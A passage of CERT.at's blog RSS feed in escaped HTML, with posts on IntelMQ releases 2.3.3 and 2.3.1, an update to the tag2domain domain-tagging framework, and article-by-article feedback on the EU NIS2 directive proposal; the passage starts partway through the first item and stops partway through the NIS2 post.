&lt;p class=&quot;block&quot;&gt;Beside small error corrections it comes with support for a few &lt;a href=&quot;https://www.shadowserver.org/news/changes-in-sinkhole-and-honeypot-report-types-and-formats/&quot;&gt;new feeds provided by the Shadowserver foundation&lt;/a&gt;. Several feeds have been re-organized, renamed and split for better clarity. The &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#shadowserver-supported-reports&quot;&gt;Shadowserver parser documentation&lt;/a&gt; contains a list of all feeds supported by IntelMQ.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A detailed list of all changes can be read in the &lt;a href=&quot;https://github.com/certtools/intelmq/releases/tag/2.3.3&quot;&gt;release notes&lt;/a&gt;, the full documentation can be found at &lt;a href=&quot;https://www.cert.at/intelmq.readthedocs.io/&quot;&gt;intelmq.readthedocs.io&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Mon, 31 May 2021 20:39:28 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/5/intelmq-release-233-with-support-for-new-shadowserver-feeds</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-05-31T20:39:28Z</dc:date></item><item><title>Flexible taxonomies and new software for the tag2domain project</title><link>https://www.cert.at/en/blog/2021/4/flexible-taxonomies-and-new-software-for-the-tag2domain-project</link><description>&lt;p class=&quot;block&quot;&gt;Domain Names are the center piece of locating services on the internet and they can be used for a variety of purposes and services. Understanding the type of services a Domain Name offers is one of the key aspects of Internet Security. In another post last year we already &lt;a title=&quot; tag2domain - a system for labeling DNS domains Published&quot; href=&quot;https://www.cert.at/en/news/blog/tag2domain&quot;&gt;introduced tag2domain&lt;/a&gt;, our tagging / labelling framework for domain names that helps us to better understand this landscape of services and software.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In this article we want to highlight a recently released, major update to the &lt;a href=&quot;https://github.com/certtools/tag2domain/&quot;&gt;tag2domain repository&lt;/a&gt;. In this update we improve on the basic concepts of tag2domain, introduce software components that manage tag creation and updating, and add scripts and documentation that help in setting up a tag2domain database.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This work is part of nic.at&amp;rsquo;s project within the Connecting Europe Facilities (CEF) framework as project &lt;a title=&quot;&amp;ldquo;Enhancing Cybersecurity in Austria&amp;rdquo; (2018-AT-IA-0111)&quot; href=&quot;https://www.cert.at/en/about-us/projects/current#3-4-1-3&quot;&gt;2018-AT-IA-0111&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;tag2domain &amp;ndash; Basics&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Before we get into the new developments, let us briefly reiterate the basic concepts of tag2domain. tag2domain is a framework for labelling DNS domain names with tags that is inspired by similar tagging systems such as the &lt;a title=&quot;MISP taxonomies&quot; href=&quot;https://github.com/MISP/misp-taxonomies&quot;&gt;MISP system&lt;/a&gt;, the &lt;a title=&quot;RSIT taxonomy&quot; href=&quot;https://github.com/enisaeu/Reference-Security-Incident-Taxonomy-Task-Force/&quot;&gt;RSIT taxonomy&lt;/a&gt;, and &lt;a href=&quot;https://wiki.openstreetmap.org/wiki/Tags&quot;&gt;OpenStreetMap tags&lt;/a&gt;. Think of these tags as sticky notes that attach to a domain and represent some kind of interesting property. These tags are grouped into taxonomies and each tag has a name and may also have a value. A single tag then looks like this:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;(cert-example-domain.at) -&amp;gt; taxonomy:tag = value&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As an example consider a taxonomy &amp;ldquo;proper_names&amp;rdquo; with tags that could look like:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;(city-of-vienna.at) -&amp;gt; proper_names:place_name = city&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The tags themselves are things like &amp;ldquo;place_name&amp;rdquo;, &amp;ldquo;first_name&amp;rdquo;, &amp;ldquo;organization_name&amp;rdquo; and so on. Under the tag &amp;ldquo;place_name&amp;rdquo; there are values named &amp;ldquo;city&amp;rdquo;, &amp;ldquo;village&amp;rdquo;, or &amp;ldquo;river&amp;rdquo;. A single domain can be associated with multiple tags. For example the name &amp;ldquo;Steyr&amp;rdquo; is the name of a city and the name of a river making both tags appropriate for a domain name that contains &amp;ldquo;steyr&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Since some properties of a domain name can change over time (e.g. is there a website hosted under this domain?), each tag has a start and an end date so one can calculate statistics over these tags at different points in time. Also, as some properties cannot be measured continuously, we include a &amp;ldquo;measured_at&amp;rdquo; property that gets updated each time a tag is confirmed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The overall setup of a tag2domain tagging system looks like this:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20210407/components_no_msm2tag.svg&quot; alt=&quot;&quot; width=&quot;846&quot; height=&quot;341&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We measure domain properties and pack them into measurements. These measurements get handed off to a service that updates the tag2domain database. On the other side we want to retrieve the gathered data via a REST interface.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;All these components are now included in the &lt;a href=&quot;https://github.com/certtools/tag2domain/&quot;&gt;tag2domain repository&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;tag2domain &amp;ndash; New features&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;To make tag2domain tags a little more flexible we added two features to the basic framework:&lt;/p&gt;&#13;
&lt;ol&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We now allow the tag and value set of a taxonomy to grow as new tags and values are observed. This enables us to define taxonomies where tags and values are not known in advance.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We added categories that group tags together within a taxonomy. This is done on the semantic layer by adding a prefix &amp;ldquo;&lt;code&gt;category_name::&lt;/code&gt;&amp;rdquo; to the tag name and is used to calculate fine-grained statistics using the &lt;em&gt;tag2domain-api&lt;/em&gt; programming interface.&lt;/li&gt;&#13;
&lt;/ol&gt;&#13;
&lt;p&gt;An example where both of these features come in handy is when one wants to tag software used under a given domain name, like so:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;(city-of-vienna.at) -&amp;gt; software:web-server::apache = v2.4.232&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;With the new capabilities of tag2domain the set of version numbers can grow as new versions are rolled out and the &amp;ldquo;web-server&amp;rdquo; category can be used to calculate statistics such as the market share of different web servers.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In addition to updating the tag2domain framework, we also added py_tag2domain, a programming library that takes measurements as an input and converts them into tags stored in a tag2domain database. Measurements are simple JSON objects such as this one:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;{&lt;br /&gt;    &quot;version&quot;: &quot;1&quot;,&lt;br /&gt;&amp;nbsp;   &quot;tag_type&quot;: &quot;domain&quot;,&lt;br /&gt;&amp;nbsp;   &quot;tagged_id&quot;: 3,&lt;br /&gt;&amp;nbsp;   &quot;taxonomy&quot;: &quot;names&quot;,&lt;br /&gt;&amp;nbsp;   &quot;producer&quot;: &quot;namefinder&quot;,&lt;br /&gt;&amp;nbsp;   &quot;measured_at&quot;: &quot;2020-12-23T10:30:51&quot;,&lt;br /&gt;&amp;nbsp;   &quot;measurement_id&quot;: &quot; namefinder/1&quot;,&lt;br /&gt;&amp;nbsp;   &quot;tags&quot;: [&lt;br /&gt;&amp;nbsp;       {&lt;br /&gt;            &quot;tag&quot;: &quot;place_name&quot;,&lt;br /&gt;            &quot;value&quot;: &quot;city&quot;&lt;br /&gt;        }&lt;br /&gt;    ]&lt;br /&gt;}&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;em&gt;py_tag2domain&lt;/em&gt; has been integrated into &lt;em&gt;tag2domain-api&lt;/em&gt; so that measurements can be delivered by a REST call. Also, we built a service called &lt;em&gt;msm2tag2domain&lt;/em&gt; that fetches measurements from a Kafka topic and does the same thing.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In addition to these new software components we overhauled the setup process of tag2domain, expanded the documentation, and created docker-based demo setups so you can easily try it out for yourself.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If you have any feedback to this article or any comments regarding tag2domain you can reach us via &lt;a href=&quot;mailto:tag2domain@cert.at&quot;&gt;tag2domain@cert.at&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Tue, 06 Apr 2021 14:59:18 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/4/flexible-taxonomies-and-new-software-for-the-tag2domain-project</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-04-06T14:59:18Z</dc:date></item><item><title>IntelMQ bug fix release 2.3.1</title><link>https://www.cert.at/en/blog/2021/3/intelmq-bug-fix-release-231</link><description>&lt;p class=&quot;block&quot;&gt;This release does not add any major features to IntelMQ but is considered purely a maintenance release. It addresses some minor errors and contains usability enhancements for the new API. Some notable changes are listed below. Below we present a short summary of the changes. We thank all contributors who participated in this release!&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As usual, the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/installation.html&quot;&gt;installation&lt;/a&gt; and &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/upgrade.html&quot;&gt;upgrade&lt;/a&gt; instructions can be found on &lt;a href=&quot;https://intelmq.readthedocs.io/&quot;&gt;intelmq.readthedocs.io&lt;/a&gt; and the full changelogs can be seen on GitHub: &lt;a href=&quot;https://github.com/certtools/intelmq/releases/tag/2.3.1&quot;&gt;IntelMQ 2.3.1&lt;/a&gt;, &lt;a href=&quot;https://github.com/certtools/intelmq-api/releases/tag/2.3.1&quot;&gt;IntelMQ API 2.3.1&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://github.com/certtools/intelmq-manager/releases/tag/2.3.1&quot;&gt;IntelMQ Manager 2.3.1&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The Cymru CAP Parser has been adapted to&amp;nbsp;accommodate for the new format for events of the category &quot;bruteforce&quot; (by Sebastian Wagner, CERT.at). The Shodan Parser now supports nested conversions, improved protocol detection and has a greatly extended parser mapping (by Mikk Margus M&amp;ouml;ll, CERT.EE). A missing description for the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/feeds.html#country-stream&quot;&gt;Shodan Country Stream&lt;/a&gt; has been added to the feed documentation (by Sebastian Wagner, CERT.at).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The sections on intelmq-cb-mailgen and fody in the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/ecosystem.html&quot;&gt;ecosystem document&lt;/a&gt; received revised (by Bernhard Reiter, Intevation) and a new summary of &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/hardware-requirements.html&quot;&gt;hardware requirements&lt;/a&gt; has been added (by Sebastian Wagner, CERT.at).&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;IntelMQ API-related changes&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/intelmq-api.html&quot;&gt;IntelMQ API documentation&lt;/a&gt; now has more details on the required write permission for the session database file (by Birger Schacht, CERT.at). The API backend now gives a more verbose error message for session database permission errors including a hint for resolution (by Birger Schacht, CERT.at).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The intelmqsetup tool, which is part of the installation routine for manual IntelMQ installations, is now able to automatically create the required directory layout and file permissions for the IntelMQ API (by Sebastian Wagner, CERT.at) and also covers the webserver and sudoers configuration for IntelMQ API and IntelMQ Manager (by Sebastian Wagner, CERT.at).&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;IntelMQ Manager-related changes&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The required authentication token in save-data requests of the &quot;Configuration&quot; tab is now sent to the backend (by Marcos Gonzalez, CNCSRD-DO). In the following two locations, link destinations that still pointed to the old PHP-based backend URLs have been fixed: &quot;Clear Configuration&quot; link destination on the configuration page and the link to the bots configuration on the monitor page (by Sebastian Wagner, CERT.at).&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Fri, 26 Mar 2021 13:51:37 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/3/intelmq-bug-fix-release-231</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-03-26T13:51:37Z</dc:date></item><item><title>NIS2 Proposal: First feedback on the normative text</title><link>https://www.cert.at/en/blog/2021/3/nis2-proposal-first-feedback-on-the-normative-text</link><description>&lt;p class=&quot;block&quot;&gt;After looking at the recitals a few weeks ago, here is my feedback on the normative text of the NIS2 proposal:&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 1(2)(c) &lt;/strong&gt;[...] lays down obligations on cybersecurity information sharing.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It doesn't just provide obligations, it also &lt;strong&gt;provides a legal basis&lt;/strong&gt; for information sharing. From our perspective, that's even more important than the obligation.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 2(2)(a)&lt;/strong&gt; the services are provided by one of the following entities:&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Overall, the NIS2 is moving from the service-orientation towards a focus on organisations. Here, &quot;service&quot; appears and it looks like a holdover from the old text. There is no clear definition on what &quot;services&quot; are covered by the language in all of paragraph 2, leading to potentially absurd interpretations. e.g.:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 2(2)(a) (i) + (iii)&lt;/strong&gt; &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(i) public electronic communications networks or publicly available electronic communications services referred to in point 8 of Annex I; &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(iii) top&amp;ndash;level domain name registries and domain name system (DNS) service providers referred to in point 8 of Annex I; &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Let's say that an important entity runs a summer vacation camp for its employees that is connected via a small non-profit (e.g., rural wifi) ISP. Internet connectivity and DNS resolution services at that resort is a service of the entity, making the community-run ISP covered by NIS2. Or: the tennis-club of a larger entity is using dedicated server hosted at a data-centre for a few dozens of &amp;euro; per month. It also runs an authoritative DNS server. Thus, it falls under the NIS2 directive.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art 2(2)(c) &lt;/strong&gt;the entity is the sole provider of a service in a Member State;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Same thing: To be the sole provider of &lt;a href=&quot;https://www.angelfire.com/ca3/tomsnyder/hg-2-12.html&quot;&gt;lemon-soaked paper napkins&lt;/a&gt; (to quote Douglas Adams) in a country doesn't make you important. The term &quot;service&quot; really needs a &quot;relevant&quot; or &quot;important&quot; or &quot;essential&quot; in front of it.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 4(4)&lt;/strong&gt; 'security of network and information systems&amp;rsquo; means the ability of network and information systems to resist, at a given level of confidence, any &lt;strong&gt;action&lt;/strong&gt; that compromises the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the related services offered by, or accessible via, those network and information systems;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The word &quot;action&quot; can be read as a human doing something. If we look a the &lt;a href=&quot;https://www.enisa.europa.eu/topics/incident-reporting/cybersecurity-incident-report-and-analysis-system-visual-analysis/visual-tool&quot;&gt;statistics collected by ENISA as part of the Art 13(a) reporting&lt;/a&gt;, we see that malicious activity has just a minor impact on the availability of the telecommunication services. If we have the CIA triad in mind, we really have to look far beyond &quot;actions&quot;, and also have to include &quot;events&quot; or &quot;circumstances&quot;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 4(15)&lt;/strong&gt; &amp;lsquo;top&amp;ndash;level domain name registry&amp;rsquo; means an entity which has been delegated a specific TLD and is responsible for administering the TLD including the registration of domain names under the TLD and the technical operation of the TLD, including the operation of its name servers, the maintenance of its databases and the distribution of TLD zone files across name servers; &lt;br /&gt;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This fixation on TLDs is counter-productive. For example: nic.at allows the creation of new domains under .at, .or.at and .co.at (the latter being legacy second level domains). I see no reason why the regulation should treat those three parent domains differently from each other.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt; &lt;strong&gt;Art. 5(2)&lt;/strong&gt; (missing)&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;National cybersecurity strategies need to address the international engagement and cyber diplomacy aspect, e.g., the standardization efforts of the ITU or the Internet governance by ICANN.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 6(2)&lt;/strong&gt; ENISA shall develop and maintain a European vulnerability registry.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As I wrote while discussing the recitals, the world does not need a duplication of the CVE database that is run by MITRE. Please cooperate! Start with acting as a CNA, and offer to act as a backup for the main database. We need globally unique identifiers for vulnerabilities.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 7(3)&lt;/strong&gt; (missing)&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Please add a bullet on funding.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 8(3)&lt;/strong&gt; Each Member State shall designate one national single point of contact on cybersecurity (&amp;lsquo;single point of contact&amp;rsquo;).&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Please either restrict the SPoC to a purely administrative function, or just cut it out. It's not needed for operational information sharing.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 9(1)&lt;/strong&gt; Each Member State shall designate one or more CSIRTs which shall comply with the requirements set out in Article 10(1), covering at least the sectors, subsectors or entities referred to in Annexes I and II, and be responsible for incident handling in accordance with a well&amp;ndash;defined process.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The language could be clearer that the union of the constituencies of the set of CSIRTs needs to be a superset of all the sectors. Maybe use something like &quot;covering together at least the sectors, ...&quot;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 10(1)(d)&lt;/strong&gt; &lt;/em&gt; CSIRTs shall be adequately staffed to ensure availability at all times;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This could either mean a 24x7 staffed CSIRT office or just a way to alert an CSIRT analyst who is on a on-call duty. A clarification might be helpful.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 10(2)(a)&lt;/strong&gt; &lt;/em&gt; monitoring cyber threats, vulnerabilities and incidents at national level;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Monitoring can be purely passive, where the CSIRT is just reading OSINT or check their mailboxes for incoming incident reports. Or, it could be active monitoring, going out trying to find vulnerabilities by testing, scanning or probing systems. From our experience as a national CSIRT, active scanning is an important part of the job. I'd prefer if the NIS2 would be clearer on this subject.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 11(3) &lt;/strong&gt;Each Member State shall ensure that its competent authorities or CSIRTs inform its single point of contact of notifications on incidents, significant cyber threats and near misses submitted pursuant to this Directive.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Just cut out the SPoC from all operational cooperation, and replace it by the CyCLONE officers.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 12(4)(b)&lt;/strong&gt; exchanging best practices and information in relation to the implementation of this Directive, including in relation to cyber threats, incidents, vulnerabilities [...]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I'm all for the Cooperation Group to talk about best practices, this could also be read as that the CG is the right place to talk about concrete incidents and their impact. Perhaps it should be clearer that the CG's job is not the exchange of operational information.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 13(1)&lt;/strong&gt; In order to contribute to the development of confidence and trust and to promote swift and effective operational cooperation among Member States, a network of the national CSIRTs is established.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We had a lot of head-ache with this language when formulating the RoP of the CSIRTs Network a few years ago. The problem is that &quot;national CSIRT&quot; is never defined in this document. I wrote a &lt;a href=&quot;https://cert.at/en/blog/2018/8/blog-20180731155524-2252&quot;&gt;long blog-post&lt;/a&gt; about this some time ago. Just drop &quot;national&quot; here, we're defining the membership in the next paragraph anyway.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 13(2)&lt;/strong&gt; The CSIRTs network shall be composed of representatives of the Member States&amp;rsquo; CSIRTs and CERT&amp;ndash;EU.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As &quot;CSIRT&quot; is a generic term, this language is too broad. It should be made clear that we're talking about the set of CSIRTs that are introduced in Article 9(1). Additionally, why &quot;representatives&quot;? The CNW is a network of teams, and not just a forum where representatives of the teams can talk to each other.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;So perhaps use &quot;The CSIRTs network shall be composed of the Member States&amp;rsquo; CSIRTs which are designated according to Article 9(1) and CERT&amp;ndash;EU.&quot;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 13(3)c&lt;/strong&gt; at the request of a representative of the CSIRT network potentially affected by an incident, exchanging and discussing information in relation to that incident and associated cyber threats, risks and vulnerabilities;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Isn't that already covered by (b)?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 13(3)&lt;/strong&gt; (missing)&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The CSIRTs Network is also used to share (on a voluntary basis) tools, extensions to tools, processes and documents that members have created. It would be helpful if this would also get a bullet point in Art 13(3).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 14(3)&lt;/strong&gt; (missing)&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The EU-CyCLONe should also take over the operational aspects of the old SPOC, i.e. the forwarding of major incident reports affecting multiple EU member states.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 15(1)b&lt;/strong&gt; the technical, financial and human resources available to competent authorities and cybersecurity policies, [...]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It would be helpful, if the report does not only provide that information regarding the competent authorities, but also the CSIRTs and the national CyCLONe structure.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 16&lt;/strong&gt; Peer-reviews&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I support the basic idea of the peer reviews. From what I know, such reviews are already standard practice in the realms of law enforcement. Two points seem to be missing from the article:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Cost. Who is supposed to cover the expenses?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Classification. Yes, &quot;the reports may be published&quot; is in 7., but I'm not sure that's a good idea as it is written. I would recommend going for a confidential report to be shared only internally (CG, CNW, EC, ENISA) and a TLP:WHITE version for public consumption.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 17(2)&lt;/strong&gt; Member States shall ensure that members of the management body follow specific trainings, on a regular basis, [...]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Is &quot;follow a training&quot; the same as &quot;attend a training&quot; (or is it &quot;following the stuff learned during trainings&quot;)? While I support the idea behind this point, I'm not sure how that can be implemented and audited? Whose job is it to verify that the CEOs and others possess the relevant education?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 20(1)&lt;/strong&gt; Where appropriate, those entities shall notify, without undue delay, the recipients of their services of incidents that are likely to adversely affect the provision of that service.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This might be tricky, the qualifier &quot;When appropriate&quot; being really important to make this workable. As we're now expanding the set of organisations covered by this directive, handling the customer notifications becomes really tricky.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Determining the &quot;recipients of their services&quot; is in many cases &quot;whoever might walk through our door tomorrow&quot; (think supermarkets or hospitals). There is no way those entities can do targeted notifications. So how should those cases be handled?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 20(2)&lt;/strong&gt; Member States shall ensure that essential and important entities notify, without undue delay, the competent authorities or the CSIRT of any significant cyber threat that those entities identify that could have potentially resulted in a significant incident.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We have a problem here. Going back to the definition contained in REGULATION (EU) 2019/881: &lt;em&gt;&quot;cyber threat&quot; means any potential circumstance, event or action that could damage, disrupt or otherwise adversely impact network and information systems, the users of such systems and other persons;&lt;/em&gt;&lt;/p&gt;&#13;
